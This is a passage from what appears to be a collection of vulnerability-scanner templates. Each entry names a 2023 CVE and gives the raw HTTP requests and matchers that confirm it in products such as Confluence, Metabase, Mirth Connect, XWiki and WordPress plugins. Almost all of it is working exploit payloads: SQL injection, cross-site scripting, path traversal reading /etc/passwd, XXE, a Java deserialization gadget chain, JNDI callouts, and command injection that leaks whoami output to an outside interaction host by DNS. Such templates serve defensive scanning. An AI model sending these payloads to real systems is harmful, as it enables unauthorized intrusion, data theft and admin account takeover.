/downloader.php?file=%3B{{cmd}}%00.zip HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"regex","part":"body","regex":["33332-3202-EVC"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-37265","info":{"name":"CasaOS  < 0.4.4 - Authentication Bypass via Internal IP","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/v1/folder?path=%2F"],"headers":{"X-Forwarded-For":"127.0.0.1"},"matchers":[{"type":"word","words":["\"success\":200","\"message\":\"ok\"","content","is_dir"],"condition":"and"}],"extractors":[{"type":"json","json":[".data.content[].path"]}]}]},{"id":"CVE-2023-31465","info":{"name":"TimeKeeper by FSMLabs - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /getsamplebacklog?arg1=2d0ows2x9anpzaorxi9h4csmai08jjor&arg2=%7b%22type%22%3a%22client%22%2c%22earliest%22%3a%221676976316.328%7c%7cnslookup%20%24(xxd%20-pu%20%3c%3c%3c%20%24(whoami)).{{interactsh-url}}%7c%7cx%22%2c%22latest%22%3a1676976916.328%2c%22origins%22%3a%5b%7b%22ip%22%3a%22{{Hostname}}%22%2c%22source%22%3a0%7d%5d%2c%22seriesID%22%3a3%7d&arg3=undefined&arg4=undefined&arg5=undefined&arg6=undefined&arg7=undefined HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["{\"seriesID\":"]}]}]},{"id":"CVE-2023-26469","info":{"name":"Jorani 1.0.0 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /session/login HTTP/1.1\nHost: {{Hostname}}\n","POST /session/login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ncsrf_test_jorani={{csrf}}&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login={{payload}}&CipheredValue=DummyPassword\n","GET /pages/view/log-{{date_time(\"%Y-%M-%D\")}} HTTP/1.1\nHost: {{Hostname}}\nX-REQUESTED-WITH: XMLHttpRequest\n{{header}}: CVE-2023-26469\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["7cca0844e81cd333152def045fe075c2"]},{"type":"status","part":"header_3","status":[401]}],"extractors":[{"type":"regex","part":"body","group":1,"internal":true,"name":"csrf","regex":["name=\"csrf_test_jorani\" value=\"(.*?)\""]}]}]},{"id":"CVE-2023-27847","info":{"name":"PrestaShop xipblog - SQL Injection","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains_any(tolower(response), \"prestashop\", \"xipblog\")"],"internal":true}]},{"raw":["@timeout: 20s\nGET /module/xipblog/archive?id=1&page_type=category&rewrite=news&subpage_type=post\"+UNION+ALL+SELECT+NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(md5({{num}})),NULL,NULL--+- HTTP/1.1\nHost: {{Hostname}}\n","@timeout: 20s\nGET /module/xipblog/archive?id=1&page_type=category&rewrite=news&subpage_type=post\"+AND+(SELECT+5728+FROM+(SELECT(SLEEP(6)))AuDU)--+lafl HTTP/1.1\nHost: {{Hostname}}\n"],"stop-at-first-match":true,"host-redirects":true,"matchers":[{"type":"word","name":"union-based","part":"body_1","words":["{{md5({{num}})}}"]},{"type":"dsl","name":"time-based","dsl":["duration_2>=6"]}]}]},{"id":"CVE-2023-26360","info":{"name":"Unauthenticated File Read Adobe ColdFusion","severity":"high"},"requests":[{"raw":["POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/iedit.cfc?method=wizardHash&_cfclient=true&returnFormat=wddx&inPassword=foo HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_variables=%7b%22_metadata%22%3a%7b%22classname%22%3a%22i/../lib/password.properties%22%7d%2c%22_variables%22%3a%5b%5d%7d\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["password=","encrypted=true","adobe"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]}]}]},{"id":"CVE-2023-6063","info":{"name":"WP Fastest Cache 1.2.2 - SQL Injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/wp-fastest-cache/readme.txt"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(body, \"WP Fastest Cache\")"],"condition":"and","internal":true}]},{"raw":["@timeout: 20s\nGET /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nCookie: wordpress_logged_in=\" AND (SELECT 5025 FROM (SELECT(SLEEP(7)))NkcI) AND \"tqKU\"=\"tqKU\n"],"matchers":[{"type":"dsl","dsl":["duration>=7","status_code == 200","contains(body, \"/wp-\")"],"condition":"and"}]}]},{"id":"CVE-2023-29506","info":{"name":"XWiki >= 13.10.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/xwiki/authenticate/wiki/xwiki%22onload=%22alert(document.domain)%22/resetpassword"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["wiki-xwiki\"onload=\"alert(document.domain)\"","resetPasswordForm"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-2272","info":{"name":"Tiempo.com <= 0.1.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","POST /wp-admin/admin.php?page=tiempocom%2Fapp%2Fadmin.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\npage=%22%3E%3Csvg%2Fonload%3Dalert%28document.domain%29%3E\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"<svg/onload=alert(document.domain)>\")","contains(body_2, \"Tiempo\")"],"condition":"and"}]}]},{"id":"CVE-2023-38040","info":{"name":"Revive Adserver 5.4.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}"],"host-redirects":true,"max-redirects":2,"matchers":[{"type":"word","part":"body","words":["Revive Adserver"],"internal":true}]},{"method":"GET","path":["{{BaseURL}}/www/delivery/al.php?zoneid=1&layerstyle=geocities&closetext=%3Cscript%3Ealert(document.domain);%3C/script%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain);</script>"]},{"type":"word","part":"content_type","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-1434","info":{"name":"Odoo - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/web/set_profiling?profile=0&collectors=<script>alert(document.domain)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","\"params\":","session"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-39677","info":{"name":"PrestaShop MyPrestaModules - PhpInfo Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/modules/simpleimportproduct/send.php?phpinfo=1","{{BaseURL}}/modules/updateproducts/send.php?phpinfo=1"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["PHP Extension","PHP Version"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","part":"body","group":1,"regex":[">PHP Version <\\/td><td class=\"v\">([0-9.]+)"]}]}]},{"id":"CVE-2023-1020","info":{"name":"Steveas WP Live Chat Shoutbox <= 1.4.2 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\naction=shoutbox-ajax-update-messages&last_timestamp=0)+UNION+ALL+SELECT+NULL,NULL,(SELECT+CONCAT(0x6338633630353939396633643833353264376262373932636633666462323562)),NULL,NULL,NULL,NULL,NULL--+&rooms%5B%5D=default\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["c8c605999f3d8352d7bb792cf3fdb25b","no_participation"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-3521","info":{"name":"FOSSBilling < 0.5.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /admin?_url=%2Fadmin&date_to='\"><img+src=x+onerror=alert(3)>&date_from='\"><img+src=x+onerror=alert(3)> HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=x onerror=alert(3)>","FOSSBilling"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-38992","info":{"name":"Jeecg-Boot v3.5.1 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/{{path}}sys/dict/loadTreeData?tableName=sys_user&text=password%20text,id&code=password&hasChildField=&converIsLeafVal=1&condition=&pid=admin&pidField=username","{{BaseURL}}/{{path}}sys/dict/loadTreeData?tableName=sys_user+t&text=password,id&code=password&hasChildField=&converIsLeafVal=1&condition=&pid=admin&pidField=username"],"payloads":{"path":[null,"jeecg-boot/"]},"stop-at-first-match":true,"matchers":[{"type":"dsl","dsl":["contains_all(body, \"parentId\\\":\", \"key\\\":\", \"{\\\"title\", \"success\\\":true\")","contains(header, \"application/json\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2023-27032","info":{"name":"PrestaShop AdvancedPopupCreator - SQL Injection","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n","@timeout 20s\nPOST /module/advancedpopupcreator/popup HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\navailablePopups=if(now()=sysdate()%2Csleep(6)%2C0)&event=1&fromController=product&getPopup=1&id_category=0&id_manufacturer=0&id_product=1&id_supplier=0&referrer=&responsiveWidth=1280&time={{time}}&token={{token}}\n"],"matchers":[{"type":"dsl","dsl":["duration_2>=6","status_code == 200","contains(content_type, \"text/html\")","contains_all(body, 'popups','hasError')"],"condition":"and"}],"extractors":[{"type":"regex","name":"time","group":1,"regex":[",\"time\":([0-9]+),"],"internal":true},{"type":"regex","name":"token","group":1,"regex":[",\"static_token\":\"([0-9a-z]+)\","],"internal":true}]}]},{"id":"CVE-2023-52085","info":{"name":"Winter CMS Local File Inclusion - (LFI)","severity":"medium"},"requests":[{"raw":["GET /backend/backend/auth/signin HTTP/1.1\nHost: {{Hostname}}\n","POST /backend/backend/auth/signin HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_token={{_token}}&postback=1&login={{username}}&password={{password}}\n","POST /backend/system/mailbrandsettings HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-WINTER-REQUEST-HANDLER: onSave\nX-WINTER-REQUEST-PARTIALS:\nX-Requested-With: XMLHttpRequest\n\n_token={{_token}}&MailBrandSetting%5Bbody_bg%5D=%2342445B;@import%20(inline)%20%22/etc/passwd%22&redirect=0\n","GET /backend/system/mailbrandsettings HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"max-redirects":3,"matchers":[{"type":"regex","part":"body_4","regex":["root:[x*]:0:0:"]}],"extractors":[{"type":"regex","part":"body","name":"_token","group":1,"regex":["<input name=\"_token\" type=\"hidden\" value=\"([0-9a-zA-Z]{40})\">"],"internal":true}]}]},{"id":"CVE-2023-0678","info":{"name":"PHPIPAM <v1.5.1 - Missing Authorization","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/functions/scripts/find_full_subnets.php"],"matchers":[{"type":"dsl","dsl":["contains_all(body, \"Array\", \"[subnet]\", \"[description]\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2023-46805","info":{"name":"Ivanti ICS - Authentication Bypass","severity":"high"},"requests":[{"raw":["GET /api/v1/totp/user-backup-code/../../system/system-information HTTP/1.1\nHost: {{Hostname}}\n","GET /api/v1/cav/client/status/../../admin/options HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"or","matchers":[{"type":"dsl","dsl":["status_code_1 == 200","contains_all(body_1, \"build\", \"system-information\", \"software-inventory\")","contains(header_1, \"application/json\")"],"condition":"and"},{"type":"dsl","dsl":["status_code_2 == 200","contains_all(body_2, \"poll_interval\\\": 300\", \"block_message\\\": \\\"\")","contains(header_2, \"application/json\")"],"condition":"and"}]}]},{"id":"CVE-2023-36346","info":{"name":"POS Codekop v2.0 - Cross Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/print.php?nm_member=<script>alert(document.location)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.location)</script>","<title>print</title>"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-34754","info":{"name":"Bloofox v0.5.2.1 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /admin/index.php HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}&action=login\n","POST /admin/index.php?mode=settings&page=plugins&action=edit HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nstatus=1&pid=14'+AND+(SELECT+7401+FROM+(SELECT(SLEEP(6)))hwrS)--+Ptkr%26send%3dSave&send=Save\n"],"matchers":[{"type":"dsl","dsl":["duration_2>=6","contains_all(body_2, \"Active</option>\", \"Inactive</option>\")","status_code_2 == 200"],"condition":"and"}]}]},{"id":"CVE-2023-27524","info":{"name":"Apache Superset - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET /api/v1/database/{{path}} HTTP/1.1\nHost: {{Hostname}}\nCookie: session={{session}}\n"],"payloads":{"path":["1","2","3","4","5","6","7","9","10"],"session":["eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZKFnng.XPeCvkBiP7rOv1PhgKZ8xkzi2jk","eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZKFu3g.k_WNoBY1ouhQyOXa5UcYdjVVuq0","eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZKG_fg.KalpJbMq1SZPCBuunG9-ycDX9HM","eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZKG_zQ.FPiBfT39gn2slf--XZHsk0rByEY","eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZKHAPQ.zRjwotMHJES3eW8fJH8F_5GlD-U"]},"attack":"clusterbomb","stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"database_name\":","\"configuration_method\":"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-43208","info":{"name":"NextGen Healthcare Mirth Connect - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /api/server/version HTTP/1.1\nHost: {{Hostname}}\nX-Requested-With: OpenAPI\n","POST /api/users HTTP/1.1\nHost: {{Hostname}}\nX-Requested-With: OpenAPI\nContent-Type: application/xml\n\n<sorted-set>\n  <string>abcd</string>\n  <dynamic-proxy>\n    <interface>java.lang.Comparable</interface>\n    <handler class=\"org.apache.commons.lang3.event.EventUtils$EventBindingInvocationHandler\">\n      <target class=\"org.apache.commons.collections4.functors.ChainedTransformer\">\n        <iTransformers>\n          <org.apache.commons.collections4.functors.ConstantTransformer>\n            <iConstant class=\"java-class\">java.lang.Runtime</iConstant>\n          </org.apache.commons.collections4.functors.ConstantTransformer>\n          <org.apache.commons.collections4.functors.InvokerTransformer>\n            <iMethodName>getMethod</iMethodName>\n            <iParamTypes>\n              <java-class>java.lang.String</java-class>\n              <java-class>[Ljava.lang.Class;</java-class>\n            </iParamTypes>\n            <iArgs>\n              <string>getRuntime</string>\n              <java-class-array/>\n            </iArgs>\n          </org.apache.commons.collections4.functors.InvokerTransformer>\n          <org.apache.commons.collections4.functors.InvokerTransformer>\n            <iMethodName>invoke</iMethodName>\n            <iParamTypes>\n              <java-class>java.lang.Object</java-class>\n              <java-class>[Ljava.lang.Object;</java-class>\n            </iParamTypes>\n            <iArgs>\n              <null/>\n              <object-array/>\n            </iArgs>\n          </org.apache.commons.collections4.functors.InvokerTransformer>\n          <org.apache.commons.collections4.functors.InvokerTransformer>\n            <iMethodName>exec</iMethodName>\n            <iParamTypes>\n              <java-class>java.lang.String</java-class>\n            </iParamTypes>\n            <iArgs>\n              <string>nslookup {{interactsh-url}}</string>\n            </iArgs>\n          </org.apache.commons.collections4.functors.InvokerTransformer>\n        </iTransformers>\n      </target>\n      <methodName>transform</methodName>\n      <eventTypes>\n        <string>compareTo</string>\n      </eventTypes>\n    </handler>\n  </dynamic-proxy>\n</sorted-set>\n"],"matchers":[{"type":"dsl","dsl":["compare_versions(version, \"<4.4.1\")","contains(interactsh_protocol, \"dns\")","status_code_1 == 200 && status_code_2 == 500"],"condition":"and"}],"extractors":[{"type":"regex","part":"body_1","name":"version","group":1,"regex":["(.*)"],"internal":true}]}]},{"id":"CVE-2023-0448","info":{"name":"WP Helper Lite < 4.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=surveySubmit&a=%22%3E%3Csvg%20onload%3Dalert%28document.domain%29%3E"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(header, \"text/html\")","contains(body, \"><svg onload=alert(document.domain)>\")","contains(body, \"params\\\":{\\\"action\")"],"condition":"and"}]}]},{"id":"CVE-2023-40749","info":{"name":"PHPJabbers Food Delivery Script v3.0 - SQL Injection","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/index.php?controller=pjAdminOrders%26action%3dpjActionGetNewOrder%26column%3d(SELECT+(CASE+WHEN+(4213%3d4213)+THEN+0x63726561746564+ELSE+(SELECT+7877+UNION+SELECT+7153)+END))%26direction%3dASC%26page%3d1%26rowCount%3d50%26q%3d\u2019\u2019%26type%3d"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["class <strong>pjAdminOrdersaction","didn't exists"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-22515","info":{"name":"Atlassian Confluence - Privilege Escalation","severity":"critical"},"requests":[{"raw":["GET /setup/setupadministrator-start.action HTTP/1.1\nHost: {{Hostname}}\n","GET /server-info.action?bootstrapStatusProvider.applicationConfig.setupComplete=0&cache{{randstr}} HTTP/1.1\nHost: {{Hostname}}\n","GET /setup/setupadministrator-start.action HTTP/1.1\nHost: {{Hostname}}\n","@timeout:20s\nPOST /setup/setupadministrator.action HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nX-Atlassian-Token: no-check\n\nusername={{to_lower(username)}}&fullName=admin&email={{email}}.com&password={{password}}&confirm={{password}}&setup-next-button=Next\n","POST /dologin.action HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nX-Atlassian-Token: no-check\n\nos_username={{to_lower(username)}}&os_password={{password}}&login=Log+in&os_destination=%2Findex.action\n","GET /welcome.action HTTP/1.1\nHost: {{Hostname}}\n"],"redirects":true,"matchers":[{"type":"dsl","dsl":["contains(body_1, 'Setup is already complete')","contains(body_3, 'Please configure the system administrator account for this Confluence installation')","contains(location_5, '/index.action')","status_code_5 == 302","contains(body_6, 'Administration')"],"condition":"and"}],"extractors":[{"type":"dsl","dsl":["\"USER: \"+ username","\"PASS: \"+ password"]}]}]},{"id":"CVE-2023-37462","info":{"name":"XWiki Platform - Remote Code Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/bin/view/%22%5d%5d%20%7b%7b%61%73%79%6e%63%20%61%73%79%6e%63%3d%22%74%72%75%65%22%20%63%61%63%68%65%64%3d%22%66%61%6c%73%65%22%20%63%6f%6e%74%65%78%74%3d%22%64%6f%63%2e%72%65%66%65%72%65%6e%63%65%22%7d%7d%7b%7b%70%79%74%68%6f%6e%7d%7d%70%72%69%6e%74%28%33%37%32%34%33%34%38%20%2a%20%38%34%37%33%33%33%34%29%7b%7b%2f%70%79%74%68%6f%6e%7d%7d%7b%7b%2f%61%73%79%6e%63%7d%7d?sheet=SkinsCode.XWikiSkinsSheet&xpage=view","{{BaseURL}}/asyncrenderer/{{url}}?clientId={{id}}&timeout=500&wiki=xwiki"],"skip-variables-check":true,"extractors":[{"type":"regex","group":1,"name":"id","regex":["data-xwiki-async-client-id=\"(.+?)\""],"internal":true},{"type":"regex","group":1,"name":"url","regex":["<span class=\"xwiki-async\" data-xwiki-async-id=\"(.+?)\""],"internal":true}],"matchers":[{"type":"dsl","dsl":["body_2 == \"31557644536232\"","contains(header_2, \"text/html\")","status_code_2 == 200"],"condition":"and"}]}]},{"id":"CVE-2023-25194","info":{"name":"Apache Druid Kafka Connect - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST /druid/indexer/v1/sampler?for=connect HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\n    \"type\":\"kafka\",\n    \"spec\":{\n        \"type\":\"kafka\",\n        \"ioConfig\":{\n            \"type\":\"kafka\",\n            \"consumerProperties\":{\n                \"bootstrap.servers\":\"127.0.0.1:6666\",\n                \"sasl.mechanism\":\"SCRAM-SHA-256\",\n                \"security.protocol\":\"SASL_SSL\",\n                \"sasl.jaas.config\":\"com.sun.security.auth.module.JndiLoginModule required user.provider.url=\\\"rmi://{{interactsh-url}}:6666/test\\\" useFirstPass=\\\"true\\\" serviceName=\\\"x\\\" debug=\\\"true\\\" group.provider.url=\\\"xxx\\\";\"\n            },\n            \"topic\":\"test\",\n            \"useEarliestOffset\":true,\n            \"inputFormat\":{\n                \"type\":\"regex\",\n                \"pattern\":\"([\\\\s\\\\S]*)\",\n                \"listDelimiter\":\"56616469-6de2-9da4-efb8-8f416e6e6965\",\n                \"columns\":[\n                    \"raw\"\n                ]\n            }\n        },\n        \"dataSchema\":{\n            \"dataSource\":\"sample\",\n            \"timestampSpec\":{\n                \"column\":\"!!!_no_such_column_!!!\",\n                \"missingValue\":\"1970-01-01T00:00:00Z\"\n            },\n            \"dimensionsSpec\":{\n\n            },\n            \"granularitySpec\":{\n                \"rollup\":false\n            }\n        },\n        \"tuningConfig\":{\n            \"type\":\"kafka\"\n        }\n    },\n    \"samplerConfig\":{\n        \"numRows\":500,\n        \"timeoutMs\":15000\n    }\n}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["RecordSupplier"]},{"type":"status","status":[400]}]}]},{"id":"CVE-2023-48777","info":{"name":"WordPress Elementor 3.18.1 - File Upload/Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/post.php?post=1&action=elementor HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nactions={{url_encode(payload)}}&_nonce={{nonce}}&editor_post_id=1&initial_document_id=1&action=elementor_ajax\n","GET /wp-content/{{filename}}.php?cmd=cat+/etc/passwd HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["regex('root:.*:0:0:', body_4)","status_code_4 == 200"],"condition":"and"}],"extractors":[{"type":"regex","internal":true,"name":"nonce","part":"body","group":1,"regex":["admin\\\\\\/admin\\-ajax\\.php\",\"nonce\":\"([0-9a-z]+)\""]}]}]},{"id":"CVE-2023-4521","info":{"name":"Import XML and RSS Feeds < 2.1.5 - Unauthenticated RCE","severity":"critical"},"requests":[{"raw":["GET /wp-content/plugins/import-xml-feed/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Import XML and RSS Feeds"]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/import-xml-feed/uploads/169227090864de013cac47b.php?cmd=ping+{{interactsh-url}}"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]}]}]},{"id":"CVE-2023-42344","info":{"name":"OpenCMS - XML external entity (XXE)","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/opencms/cmisatom/cmis-online/query","{{BaseURL}}/cmisatom/cmis-online/query"],"headers":{"Content-Type":"application/xml;charset=UTF-8","Referer":"{{RootURL}}"},"body":"<?xml version='1.0' encoding='UTF-8'?><!DOCTYPE root [<!ENTITY test SYSTEM 'file:///etc/passwd'>]><cmis:query xmlns:cmis=\"<http://docs.oasis-open.org/ns/cmis/core/200908/>\"><cmis:statement>&test;</cmis:statement><cmis:searchAllVersions>false</cmis:searchAllVersions><cmis:includeAllowableActions>false</cmis:includeAllowableActions><cmis:includeRelationships>none</cmis:includeRelationships><cmis:renditionFilter>cmis:none</cmis:renditionFilter><cmis:maxItems>100</cmis:maxItems><cmis:skipCount>0</cmis:skipCount></cmis:query>\n","stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:","invalidArgument"],"condition":"and"}]}]},{"id":"CVE-2023-24733","info":{"name":"PMB 7.4.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/pmb/admin/convert/export_z3950_new.php?command=search&query=%3Cscript%3Ealert(document.domain);%3C/script%3E=or"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["3@1=<script>alert(document.domain)</script>@"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-34105","info":{"name":"SRS - Command Injection","severity":"high"},"requests":[{"raw":["POST /api/v1/snapshots HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"action\":  \"on_publish\", \"app\":  \"`nslookup {{interactsh-url}}`\", \"stream\":\"foo\", \"vhost\": \"foo\", \"client_id\":\"foo\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["{\"code\":","data\":"],"condition":"and"},{"type":"word","part":"content_type","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-33440","info":{"name":"Faculty Evaluation System v1.0 - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST /ajax.php?action=save_user HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=---------------------------1037163726497\n\n-----------------------------1037163726497\nContent-Disposition: form-data; name=\"id\"\n\n1\n-----------------------------1037163726497\nContent-Disposition: form-data; name=\"firstname\"\n\nAdministrator\n-----------------------------1037163726497\nContent-Disposition: form-data; name=\"lastname\"\n\na\n-----------------------------1037163726497\nContent-Disposition: form-data; name=\"img\"; filename=\"{{randstr}}.php\"\nContent-Type: application/octet-stream\n\n<?php echo md5(\"{{string}}\");unlink(__FILE__);?>\n-----------------------------1037163726497\nContent-Disposition: form-data; name=\"email\"\n\n{{email}}\n-----------------------------1037163726497\nContent-Disposition: form-data; name=\"password\"\n\n\n-----------------------------1037163726497\nContent-Disposition: form-data; name=\"cpass\"\n\n\n-----------------------------1037163726497--\n","GET /login.php HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"matchers":[{"type":"dsl","dsl":["status_code_1 == 200","regex(\"^1$\", body_1)","!regex(\"^2$\", body_1)","len(body_1) == 1","contains(body_2, \"Faculty Evaluation\")"],"condition":"and"}]}]},{"id":"CVE-2023-25157","info":{"name":"GeoServer OGC Filter - SQL Injection","severity":"critical"},"requests":[{"raw":["GET /geoserver/ows?service=WFS&version=1.0.0&request=GetCapabilities HTTP/1.1\nHost: {{Hostname}}\n","GET /geoserver/ows?service=WFS&version=1.0.0&request=GetFeature&typeName={{name}}&maxFeatures=50&outputFormat=csv HTTP/1.1\nHost: {{Hostname}}\n","@timeout: 30s\nGET /geoserver/ows?service=WFS&version=1.0.0&request=GetFeature&typeName={{name}}&CQL_FILTER=strStartswith({{column}},%27%27%27%27)=true HTTP/1.1\nHost: {{Hostname}}\n"],"stop-at-first-match":true,"iterate-all":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_3","words":["SQL SELECT"]},{"type":"word","part":"header_3","words":["text/xml"]}],"extractors":[{"type":"regex","name":"name","group":1,"regex":["<FeatureType><Name>(.*?)<\\/Name><Title>"],"internal":true,"part":"body_1"},{"type":"regex","name":"column","group":1,"regex":["FID,([aA-zZ_]+),"],"internal":true,"part":"body_2"}]}]},{"id":"CVE-2023-38646","info":{"name":"Metabase < 0.46.6.1 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /api/session/properties HTTP/1.1\nHost: {{Hostname}}\n","POST /api/setup/validate HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\n   \"token\":\"{{token}}\",\n   \"details\":{\n      \"details\":{\n         \"subprotocol\":\"h2\",\n         \"classname\":\"org.h2.Driver\",\n         \"advanced-options\":true,\n         \"subname\":\"mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM '{{file}}'//\\\\;\"\n      },\n      \"name\":\"{{randstr}}\",\n      \"engine\":\"postgres\"\n   }\n}\n"],"extractors":[{"type":"json","part":"body_1","name":"token","json":[".[\"setup-token\"]"],"internal":true}],"matchers":[{"type":"dsl","dsl":["contains_any(body_2, \"Syntax error in SQL 